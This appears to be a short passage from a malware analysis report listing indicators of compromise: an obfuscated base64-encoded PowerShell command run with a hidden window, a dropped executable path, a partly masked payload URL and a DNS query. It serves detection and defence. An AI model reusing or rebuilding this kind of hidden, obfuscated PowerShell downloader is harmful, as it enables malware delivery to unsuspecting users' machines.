Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA...
- %HOMEPATH%\r4e4spq\b6q4hq_\gq_enxi3g.exe
- http://yd##in.fun/wp-includes/J2gtP7rvBA/
- DNS ASK yd##in.fun
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA...' (with a hidden window)